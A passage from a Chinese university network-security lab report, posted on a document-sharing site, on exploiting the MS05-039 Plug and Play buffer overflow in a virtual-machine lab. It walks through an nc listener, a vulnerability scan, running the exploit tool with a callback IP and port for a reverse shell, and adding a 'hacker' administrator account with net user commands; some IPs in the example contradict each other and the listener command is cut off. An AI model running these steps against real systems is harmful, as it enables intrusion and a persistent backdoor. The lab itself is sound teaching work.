- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
计算机网络安全实验报告06new.doc
《计算机网络安全》实验报告
实验序号:6 实验项目名称:缓冲区溢出攻击与防范实验
学号 姓名 专业、班 实验地点 实1-411 指导教师 实验时间 2011-11-15 一、实验目的及要求
通过实验掌握缓冲区溢出的原理;通过使用缓冲区溢出攻击软件模拟入侵远程主机;理解缓冲区溢出危险性;理解防范和避免缓冲区溢出攻击的措施。
二、实验设备(环境)及要求
Windows 2000 server,虚拟机.
本实验需要用到虚拟机,因此每台实验主机都通过安装软件WMware Workstation分割出了虚拟机。
真实主机P1的配置为:操作系统Windows 2000 server SP0或者windows XP sp2,并且安装ms05-039.exe缓冲区溢出攻击软件。
虚拟机P2配置为:操作系统Windows2000 Server SP0(没有另外打补丁,存在ms05039漏洞)。
3)实验网络拓扑图
三、实验内容与步骤
缓冲区溢出攻击之所以成为一种常见的攻击手段,其原因在于缓冲区溢出漏洞太普通了,并且易于实现。而且,缓冲区溢出所以成为远程攻击的主要手段,其原因在于缓冲区溢出漏洞给予了攻击者所想要的一切:植入并且执行攻击代码。被植入的攻击代码以一定的权限运行有缓冲区溢出漏洞的程序,从而得到被攻击主机的控制权。
实验任务: 利用ms05-039溢出漏洞攻击
MS05-039漏洞是Microsoft Windows即插即用功能远程缓冲区溢出漏洞。Microsoft Windows即插即用(PnP)功能允许操作系统在安装新硬件时能够检测到这些设备。Microsoft Windows即插即用功能中存在缓冲区溢出漏洞,造成该漏洞的原因是Plug and Play 服务中未经检查的缓冲区–vv –l –p 99,如图2。
图2 运行nc 进行监听
2)对远程主机进ms05-039漏洞进行入侵
实验在命令行下进行,具体操作如下:
(1)运行ms05039scan.exe,如图3,设定探测目标172.16.167.103(实验中以实际虚拟机为准)。
图3 ms05039扫描
(2)点击“”按钮;
(3)运行结束后查看结果,此例中表明目标主机有该漏洞,可以进行下一步攻击。
3)攻击
(1)在dos下运行ms05039攻击程序ms0539.exe。ms0539.exe是一个利用远程主机ms05-039漏洞进行溢出的工具,它在命令行下使用,使用格式如下:
ms05039.exe host conIP conPort [target]
其中:
host :目标主机地址
conIP :回连ip地址,一般就是本地主机ip地址
onPort:回连端口,如该实验中的“99”
target :目标系统类型,缺省为1
系统类型有两种:
0:English win2k(sp4)
1 :Chinese win2k (sp4)
我们在命令行下输入:ms05039.exe 172.16.167.101 172.16.167.151,(这表示对172.16.167.103进行远程溢出,溢出后返回的ip是172.16.167.103,返回端口是99,远程主机的操作系统类型是Chinese win2k sp4),如图4所示
图4 执行ms05039攻击
(2)检查我们刚才运行nc的dos窗口,若出现图5所示,则表明攻击成功。此dos窗口中运行的任何命令都是在目标主机上运行,相当于在目标主机本机上开一个dos窗口运行程序一样。
图5 攻击成功的结果
(3)验证。运行
net user hacker /add和net localgroup administrators hacker /add
验证攻击者运行程序的权限,若成功则表明有超级用户权限。成功后可以在目标主机上验证是否添加了用户。
四、实验结果与数据处理
如以上分析结果所示。
五、分析与讨论
通过本次实验基本的掌握缓冲区溢出的原理,知道它是怎样进行攻击的。也能够通过使用缓冲区溢出攻击软件模拟入侵远程主机;明白了缓冲区溢出危险性;并且能够正确的防范和避免缓冲区溢出攻击的措施。在不断的实验中累计了经验,以后遇到这方面的事情处理起来会更加的顺畅。 六、教师评语
签名:
日期: 成绩
文档评论(0)